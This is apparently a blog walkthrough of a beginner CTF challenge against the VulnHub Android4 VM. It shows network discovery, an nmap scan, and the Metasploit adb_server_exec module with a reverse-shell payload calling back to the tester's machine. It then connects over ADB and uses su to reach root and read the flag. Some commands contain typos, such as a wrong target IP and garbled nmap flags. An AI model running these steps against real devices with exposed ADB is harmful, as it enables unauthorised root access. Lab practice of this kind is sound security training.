Hack the Android4: Walkthrough (CTF Challenge)


Hello everyone and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Android4 which is made by Touhid Shaikh. You can find the link to download this vulnerable VM here (https://www.vulnhub.com/entry/android4-1,233/).
The level of this vulnerable vm, that I would rate, is beginner.

Steps involved:
1. Port scanning and IP discovery
2. Attacking port 8080 proxy using adb_server_exec
3. Connection to the device using ADB.
4. Shell grabbing.
5. Privilege escalation and reading congratulatory flag.

Let’s get started then!
First we’ll grab the IP address using netdiscover utility present in Kali Linux.

netdiscover




In my case the IP address is 192.168.1.105

The second step is as usual port scanning. In this scan we’ll be using an all port aggressive scan using the most popular tool nmap.

nmap - p -  -A 192.168.1.105




From this we established that there is some kind of web page related to the port 8080.
Without any delay we opened the webpage but found nothing.




Anyone would establish that there is some kind of verbal tampering involved using POST method. We tried but didn’t find anyting useful.
After trying a few other methods (PHP CLI and Dropbear RCE) here is one method that we found the best for our cause.





Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device. It is a client-server program that includes three components:
·      A client, which sends commands. The client runs on your development machine. You can invoke a client from a command-line terminal by issuing an adb command.
·      A daemon (adbd), which runs commands on a device. The daemon runs as a background process on each device.
·      A server, which manages communication between the client and the daemon. The server runs as a background process on your development machine.
When you start an adb client, the client first checks whether there is an adb server process already running. If there isn't, it starts the server process

To start an ADB server we used metasploit:

use exploit/android/adb/adb_server_exec
set RHOST 192.68.1.105
set payload linux/armle/shell_reverse_tcp
set LHOST 192.168.1.108
set LPORT 3333
exploit

(It is quite possible that the local port won’t accept connection. In such a case, we change the default port from 4444 to 3333s)




If you don’t have adb installed you can install it by sudo apt-get install adb




Once the status shows “Connecting to device, ” on a new terminal window type the command:

adb connect 192.168.1.105:5555
adb shell
In shell:
ls




to go to the defaullt directory:
cd
su
Voila! We got a root shell!




In /data directory we found a folder called “root”
cd /data
ls
Final step was reading the congratulatory flag:
cd /root
ls
cat flag.txt


0 comments:

Post a Comment